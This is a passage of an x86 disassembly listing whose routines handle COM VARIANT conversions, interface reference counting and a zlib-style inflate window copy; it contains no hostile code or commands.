jmp short loc_4097C9
; ---------------------------------------------------------------------------
loc_4097C2: ; CODE XREF: sub_4097A0+F�j
mov [ebp+var_8], 0
loc_4097C9: ; CODE XREF: sub_4097A0+20�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_4097A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4097D0 proc near ; CODE XREF: sub_40831F+78A�p
; sub_4097F0+3C�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
push eax
call dword_413268
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_4097D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4097F0 proc near ; CODE XREF: sub_40831F+7FB�p
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_14 = word ptr -14h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_4097F0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
mov [ebp+var_24], ecx
mov eax, [ebp+var_24]
xor ecx, ecx
mov cx, [eax]
cmp ecx, 0Bh
jnz short loc_409829
mov edx, [ebp+var_24]
movsx eax, word ptr [edx+8]
test eax, eax
setnz al
jmp short loc_409864
; ---------------------------------------------------------------------------
loc_409829: ; CODE XREF: sub_4097F0+29�j
lea ecx, [ebp+var_1C]
call sub_4097D0
mov [ebp+var_4], 0
mov ecx, [ebp+var_24]
push ecx
push 0Bh
lea ecx, [ebp+var_1C]
call sub_409930
movsx edx, [ebp+var_14]
test edx, edx
setnz al
mov [ebp+var_20], al
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_1C]
call sub_409990
mov al, [ebp+var_20]
loc_409864: ; CODE XREF: sub_4097F0+37�j
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_4097F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409880 proc near ; CODE XREF: sub_40831F+7E3�p
var_4 = dword ptr -4
arg_0 = word ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
xor ecx, ecx
mov cx, [eax]
cmp ecx, 2
jnz short loc_4098A1
mov edx, [ebp+var_4]
mov ax, [ebp+arg_0]
mov [edx+8], ax
jmp short loc_4098DA
; ---------------------------------------------------------------------------
loc_4098A1: ; CODE XREF: sub_409880+12�j
mov ecx, [ebp+var_4]
xor edx, edx
mov dx, [ecx]
cmp edx, 0Bh
jnz short loc_4098BF
movsx eax, [ebp+arg_0]
neg eax
sbb eax, eax
mov ecx, [ebp+var_4]
mov [ecx+8], ax
jmp short loc_4098DA
; ---------------------------------------------------------------------------
loc_4098BF: ; CODE XREF: sub_409880+2C�j
mov ecx, [ebp+var_4]
call sub_4098F0
mov edx, [ebp+var_4]
mov word ptr [edx], 2
mov eax, [ebp+var_4]
mov cx, [ebp+arg_0]
mov [eax+8], cx
loc_4098DA: ; CODE XREF: sub_409880+1F�j
; sub_409880+3D�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_409880 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4098F0 proc near ; CODE XREF: sub_409880+42�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
push eax
call dword_413264
push eax
call sub_409910
add esp, 4
mov esp, ebp
pop ebp
retn
sub_4098F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409910 proc near ; CODE XREF: sub_4098F0+12�p
; sub_409930+46�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
jge short loc_409922
mov eax, [ebp+arg_0]
push eax
call sub_411822
loc_409922: ; CODE XREF: sub_409910+7�j
pop ebp
retn
sub_409910 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409930 proc near ; CODE XREF: sub_4097F0+51�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
cmp [ebp+arg_4], 0
jnz short loc_409943
mov eax, [ebp+var_4]
mov [ebp+arg_4], eax
loc_409943: ; CODE XREF: sub_409930+B�j
mov ecx, [ebp+var_4]
cmp ecx, [ebp+arg_4]
jnz short loc_409960
mov edx, [ebp+arg_0]
and edx, 0FFFFh
mov eax, [ebp+var_4]
xor ecx, ecx
mov cx, [eax]
cmp edx, ecx
jz short loc_40997E
loc_409960: ; CODE XREF: sub_409930+19�j
mov dx, word ptr [ebp+arg_0]
push edx
push 0
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+var_4]
push ecx
call dword_413260
push eax
call sub_409910
add esp, 4
loc_40997E: ; CODE XREF: sub_409930+2E�j
mov esp, ebp
pop ebp
retn 8
sub_409930 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409990 proc near ; CODE XREF: sub_40831F+9B6�p
; sub_40831F+A25�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
push eax
call dword_413264
push eax
call sub_409910
add esp, 4
mov esp, ebp
pop ebp
retn
sub_409990 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4099B0 proc near ; CODE XREF: sub_40831F+720�p
; sub_411A14+11�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax+4], ecx
mov edx, [ebp+var_4]
mov eax, [ebp+arg_4]
mov [edx+8], eax
mov ecx, [ebp+var_4]
mov dword ptr [ecx+0Ch], 0
mov edx, [ebp+var_4]
mov dword ptr [edx], offset off_414AE8
mov eax, [ebp+var_4]
cmp dword ptr [eax+8], 0
jz short loc_409A04
mov ecx, [ebp+arg_8]
and ecx, 0FFh
test ecx, ecx
jz short loc_409A04
mov edx, [ebp+var_4]
mov eax, [edx+8]
mov ecx, [ebp+var_4]
mov edx, [ecx+8]
mov ecx, [edx]
push eax
call dword ptr [ecx+4]
loc_409A04: ; CODE XREF: sub_4099B0+33�j
; sub_4099B0+40�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 0Ch
sub_4099B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409A10 proc near ; DATA XREF: HSho:off_414AE8�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_409A40
mov eax, [ebp+arg_0]
and eax, 1
test eax, eax
jz short loc_409A35
mov ecx, [ebp+var_4]
push ecx
call sub_4114EE
add esp, 4
loc_409A35: ; CODE XREF: sub_409A10+17�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_409A10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409A40 proc near ; CODE XREF: sub_40831F+735�p
; sub_409A10+A�p
; DATA XREF: ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax], offset off_414AE8
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+8], 0
jz short loc_409A6B
mov edx, [ebp+var_4]
mov eax, [edx+8]
mov ecx, [ebp+var_4]
mov edx, [ecx+8]
mov ecx, [edx]
push eax
call dword ptr [ecx+8]
loc_409A6B: ; CODE XREF: sub_409A40+17�j
mov edx, [ebp+var_4]
cmp dword ptr [edx+0Ch], 0
jz short loc_409A81
mov eax, [ebp+var_4]
mov ecx, [eax+0Ch]
push ecx
call dword_4130A8 ; LocalFree
loc_409A81: ; CODE XREF: sub_409A40+32�j
mov esp, ebp
pop ebp
retn
sub_409A40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409A90 proc near ; CODE XREF: sub_40831F+831�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], ecx
mov [ebp+var_C], 0
lea eax, [ebp+var_8]
push eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
mov eax, [ebp+var_10]
push eax
call dword ptr [edx+0B4h]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jge short loc_409ACE
push offset dword_417578
mov ecx, [ebp+var_10]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_411830
loc_409ACE: ; CODE XREF: sub_409A90+2A�j
push 0
mov eax, [ebp+var_8]
push eax
mov ecx, [ebp+arg_0]
call sub_409D00
mov ecx, [ebp+var_C]
or ecx, 1
mov [ebp+var_C], ecx
mov eax, [ebp+arg_0]
mov esp, ebp
pop ebp
retn 4
sub_409A90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409AF0 proc near ; CODE XREF: sub_40831F+7CC�p
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_14 = word ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_409AF0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 10h
mov [ebp+var_1C], ecx
mov [ebp+var_4], 0
lea eax, [ebp+var_14]
push eax
lea ecx, [ebp+arg_0]
call sub_4096F0
push eax
mov ecx, [ebp+var_1C]
mov edx, [ecx]
mov eax, [ebp+var_1C]
push eax
call dword ptr [edx+104h]
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jge short loc_409B4C
push offset dword_417578
mov ecx, [ebp+var_1C]
push ecx
mov edx, [ebp+var_10]
push edx
call sub_411830
loc_409B4C: ; CODE XREF: sub_409AF0+48�j
mov ax, [ebp+var_14]
mov [ebp+var_18], ax
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+arg_0]
call sub_4041A5
mov ax, [ebp+var_18]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn 4
sub_409AF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409B80 proc near ; CODE XREF: sub_40831F+6EC�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
cmp [ebp+arg_0], 0
jz short loc_409BA0
push 80004003h
call sub_411822
loc_409BA0: ; CODE XREF: sub_409B80+14�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_409B80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409BB0 proc near ; CODE XREF: sub_40831F+744�p
; sub_40831F+9C5�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_409D60
mov esp, ebp
pop ebp
retn
sub_409BB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409BD0 proc near ; CODE XREF: sub_40831F+7C1�p
; sub_40831F+82A�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jnz short loc_409BE9
push 80004003h
call sub_411822
loc_409BE9: ; CODE XREF: sub_409BD0+D�j
mov ecx, [ebp+var_4]
mov eax, [ecx]
mov esp, ebp
pop ebp
retn
sub_409BD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C00 proc near ; CODE XREF: sub_40831F+704�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], ecx
mov ecx, [ebp+var_C]
call sub_409D60
mov eax, [ebp+arg_8]
and eax, 14h
test eax, eax
jz short loc_409C7D
lea ecx, [ebp+var_8]
push ecx
push offset dword_417588
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call dword_4132AC
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jge short loc_409C44
mov eax, [ebp+var_4]
jmp short loc_409C9F
; ---------------------------------------------------------------------------
loc_409C44: ; CODE XREF: sub_409C00+3D�j
mov edx, [ebp+var_8]
push edx
call dword_4132A8
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jl short loc_409C6F
mov eax, [ebp+var_C]
push eax
call sub_409D50
push eax
mov ecx, [ebp+var_8]
mov edx, [ecx]
mov eax, [ebp+var_8]
push eax
call dword ptr [edx]
mov [ebp+var_4], eax
loc_409C6F: ; CODE XREF: sub_409C00+55�j
mov ecx, [ebp+var_8]
mov edx, [ecx]
mov eax, [ebp+var_8]
push eax
call dword ptr [edx+8]
jmp short loc_409C9C
; ---------------------------------------------------------------------------
loc_409C7D: ; CODE XREF: sub_409C00+19�j
mov ecx, [ebp+var_C]
push ecx
call sub_409D50
push eax
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call dword_4132AC
mov [ebp+var_4], eax
loc_409C9C: ; CODE XREF: sub_409C00+7B�j
mov eax, [ebp+var_4]
loc_409C9F: ; CODE XREF: sub_409C00+42�j
mov esp, ebp
pop ebp
retn 0Ch
sub_409C00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409CB0 proc near ; CODE XREF: sub_40831F+39�p
; sub_40831F+814�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_409CB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409CD0 proc near ; CODE XREF: sub_40831F+869�p
; sub_40831F+938�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov edx, [ecx]
mov [eax], edx
mov ecx, [ebp+var_4]
call sub_409DE0
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_409CD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409D00 proc near ; CODE XREF: sub_409A90+47�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov edx, [ebp+arg_4]
and edx, 0FFh
test edx, edx
jz short loc_409D24
mov ecx, [ebp+var_4]
call sub_409DE0
loc_409D24: ; CODE XREF: sub_409D00+1A�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 8
sub_409D00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409D30 proc near ; CODE XREF: sub_40831F+849�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
mov ecx, [ebp+var_4]
call sub_409D90
mov esp, ebp
pop ebp
retn 4
sub_409D30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409D50 proc near ; CODE XREF: sub_409C00+5B�p
; sub_409C00+81�p
push ebp
mov ebp, esp
call sub_409E10
pop ebp
retn
sub_409D50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409D60 proc near ; CODE XREF: sub_409BB0+A�p
; sub_409C00+C�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short loc_409D7F
mov ecx, [ebp+var_4]
mov edx, [ecx]
mov eax, [ebp+var_4]
mov ecx, [eax]
mov eax, [ecx]
push edx
call dword ptr [eax+8]
loc_409D7F: ; CODE XREF: sub_409D60+D�j
mov esp, ebp
pop ebp
retn
sub_409D60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409D90 proc near ; CODE XREF: sub_409D30+10�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
mov ecx, [eax]
cmp ecx, [ebp+arg_0]
jz short loc_409DCD
mov edx, [ebp+var_8]
mov eax, [edx]
mov [ebp+var_4], eax
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_0]
mov [ecx], edx
mov ecx, [ebp+var_8]
call sub_409DE0
cmp [ebp+var_4], 0
jz short loc_409DCD
mov eax, [ebp+var_4]
mov ecx, [eax]
mov edx, [ebp+var_4]
push edx
call dword ptr [ecx+8]
loc_409DCD: ; CODE XREF: sub_409D90+11�j
; sub_409D90+2F�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn 4
sub_409D90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409DE0 proc near ; CODE XREF: sub_409CD0+14�p
; sub_409D00+1F�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short loc_409DFF
mov ecx, [ebp+var_4]
mov edx, [ecx]
mov eax, [ebp+var_4]
mov ecx, [eax]
mov eax, [ecx]
push edx
call dword ptr [eax+4]
loc_409DFF: ; CODE XREF: sub_409DE0+D�j
mov esp, ebp
pop ebp
retn
sub_409DE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409E10 proc near ; CODE XREF: sub_409D50+3�p
push ebp
mov ebp, esp
mov eax, offset dword_417578
pop ebp
retn
sub_409E10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409E20 proc near ; CODE XREF: sub_40A04E+220�p
; sub_40A04E+39E�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
mov ecx, [eax+0Ch]
mov [ebp+var_4], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+30h]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
cmp edx, [ecx+34h]
ja short loc_409E4E
mov eax, [ebp+arg_0]
mov ecx, [eax+34h]
mov [ebp+var_10], ecx
jmp short loc_409E57
; ---------------------------------------------------------------------------
loc_409E4E: ; CODE XREF: sub_409E20+21�j
mov edx, [ebp+arg_0]
mov eax, [edx+2Ch]
mov [ebp+var_10], eax
loc_409E57: ; CODE XREF: sub_409E20+2C�j
mov ecx, [ebp+var_10]
sub ecx, [ebp+var_8]
mov [ebp+var_C], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_C]
cmp eax, [edx+10h]
jbe short loc_409E74
mov ecx, [ebp+arg_4]
mov edx, [ecx+10h]
mov [ebp+var_C], edx
loc_409E74: ; CODE XREF: sub_409E20+49�j
cmp [ebp+var_C], 0
jz short loc_409E87
cmp [ebp+arg_8], 0FFFFFFFBh
jnz short loc_409E87
mov [ebp+arg_8], 0
loc_409E87: ; CODE XREF: sub_409E20+58�j
; sub_409E20+5E�j
mov eax, [ebp+arg_4]
mov ecx, [eax+10h]
sub ecx, [ebp+var_C]
mov edx, [ebp+arg_4]
mov [edx+10h], ecx
mov eax, [ebp+arg_4]
mov ecx, [eax+14h]
add ecx, [ebp+var_C]
mov edx, [ebp+arg_4]
mov [edx+14h], ecx
mov eax, [ebp+arg_0]
cmp dword ptr [eax+38h], 0
jz short loc_409ED8
mov ecx, [ebp+var_C]
push ecx
mov edx, [ebp+var_8]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+3Ch]
push ecx
mov edx, [ebp+arg_0]
call dword ptr [edx+38h]
add esp, 0Ch
mov ecx, [ebp+arg_0]
mov [ecx+3Ch], eax
mov edx, [ebp+arg_4]
mov eax, [ebp+arg_0]
mov ecx, [eax+3Ch]
mov [edx+30h], ecx
loc_409ED8: ; CODE XREF: sub_409E20+8C�j
cmp [ebp+var_C], 0
jz short loc_409F04
mov edx, [ebp+var_C]
push edx
mov eax, [ebp+var_8]
push eax
mov ecx, [ebp+var_4]
push ecx
call sub_411634 ; memcpy
add esp, 0Ch
mov edx, [ebp+var_4]
add edx, [ebp+var_C]
mov [ebp+var_4], edx
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
loc_409F04: ; CODE XREF: sub_409E20+BC�j
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
cmp edx, [ecx+2Ch]
jnz loc_409FE0
mov eax, [ebp+arg_0]
mov ecx, [eax+28h]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_0]
mov ecx, [edx+34h]
cmp ecx, [eax+2Ch]
jnz short loc_409F36
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_0]
mov ecx, [eax+28h]
mov [edx+34h], ecx
loc_409F36: ; CODE XREF: sub_409E20+108�j
mov edx, [ebp+arg_0]
mov eax, [edx+34h]
sub eax, [ebp+var_8]
mov [ebp+var_C], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_C]
cmp edx, [ecx+10h]
jbe short loc_409F56
mov eax, [ebp+arg_4]
mov ecx, [eax+10h]
mov [ebp+var_C], ecx
loc_409F56: ; CODE XREF: sub_409E20+12B�j
cmp [ebp+var_C], 0
jz short loc_409F69
cmp [ebp+arg_8], 0FFFFFFFBh
jnz short loc_409F69
mov [ebp+arg_8], 0
loc_409F69: ; CODE XREF: sub_409E20+13A�j
; sub_409E20+140�j
mov edx, [ebp+arg_4]
mov eax, [edx+10h]
sub eax, [ebp+var_C]
mov ecx, [ebp+arg_4]
mov [ecx+10h], eax
mov edx, [ebp+arg_4]
mov eax, [edx+14h]
add eax, [ebp+var_C]
mov ecx, [ebp+arg_4]
mov [ecx+14h], eax
mov edx, [ebp+arg_0]
cmp dword ptr [edx+38h], 0
jz short loc_409FBA
mov eax, [ebp+var_C]
push eax
mov ecx, [ebp+var_8]
push ecx
mov edx, [ebp+arg_0]
mov eax, [edx+3Ch]
push eax
mov ecx, [ebp+arg_0]
call dword ptr [ecx+38h]
add esp, 0Ch
mov edx, [ebp+arg_0]
mov [edx+3Ch], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
mov edx, [ecx+3Ch]
mov [eax+30h], edx
loc_409FBA: ; CODE XREF: sub_409E20+16E�j
mov eax, [ebp+var_C]
push eax
mov ecx, [ebp+var_8]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_411634 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_4]
add eax, [ebp+var_C]
mov [ebp+var_4], eax
mov ecx, [ebp+var_8]
add ecx, [ebp+var_C]
mov [ebp+var_8], ecx
loc_409FE0: ; CODE XREF: sub_409E20+ED�j
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
mov [edx+0Ch], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov [ecx+30h], edx
mov eax, [ebp+arg_8]
mov esp, ebp
pop ebp
retn
sub_409E20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409FF9 proc near ; CODE XREF: sub_40AF6D+1C4�p
; sub_40AF6D+FAD�p
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push 1Ch
push 1
mov eax, [ebp+arg_10]
mov ecx, [eax+28h]
push ecx
mov edx, [ebp+arg_10]
call dword ptr [edx+20h]
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_40A047
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
mov ecx, [ebp+var_4]
mov dl, [ebp+arg_0]
mov [ecx+10h], dl
mov eax, [ebp+var_4]
mov cl, [ebp+arg_4]
mov [eax+11h], cl
mov edx, [ebp+var_4]
mov eax, [ebp+arg_8]
mov [edx+14h], eax
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_C]
mov [ecx+18h], edx
loc_40A047: ; CODE XREF: sub_409FF9+1F�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_409FF9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A04E proc near ; CODE XREF: sub_40AF6D+1080�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 58h
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
mov [ebp+var_10], ecx
mov edx, [ebp+arg_4]
mov eax, [edx]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_4]
mov edx, [ecx+4]
mov [ebp+var_2C], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+20h]
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov [ebp+var_24], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+34h]
mov [ebp+var_8], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
cmp ecx, [eax+30h]
jnb short loc_40A0A5
mov edx, [ebp+arg_0]
mov eax, [edx+30h]
sub eax, [ebp+var_8]
sub eax, 1
mov [ebp+var_30], eax
jmp short loc_40A0B1
; ---------------------------------------------------------------------------
loc_40A0A5: ; CODE XREF: sub_40A04E+44�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+2Ch]
sub edx, [ebp+var_8]
mov [ebp+var_30], edx
loc_40A0B1: ; CODE XREF: sub_40A04E+55�j
mov eax, [ebp+var_30]
mov [ebp+var_28], eax
loc_40A0B7: ; CODE XREF: sub_40A04E:loc_40AD74�j
mov ecx, [ebp+var_10]
mov edx, [ecx]
mov [ebp+var_34], edx
cmp [ebp+var_34], 9
ja loc_40AD15
mov eax, [ebp+var_34]
jmp off_40AD7D[eax*4]
loc_40A0D3: ; DATA XREF: HSho:off_40AD7D�o
cmp [ebp+var_28], 102h
jb loc_40A1D9
cmp [ebp+var_2C], 0Ah
jb loc_40A1D9
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_24]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_2C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+var_10]
mov ecx, [eax+18h]
push ecx
mov edx, [ebp+var_10]
mov eax, [edx+14h]
push eax
mov ecx, [ebp+var_10]
xor edx, edx
mov dl, [ecx+11h]
push edx
mov eax, [ebp+var_10]
xor ecx, ecx
mov cl, [eax+10h]
push ecx
call sub_40CE56
add esp, 18h
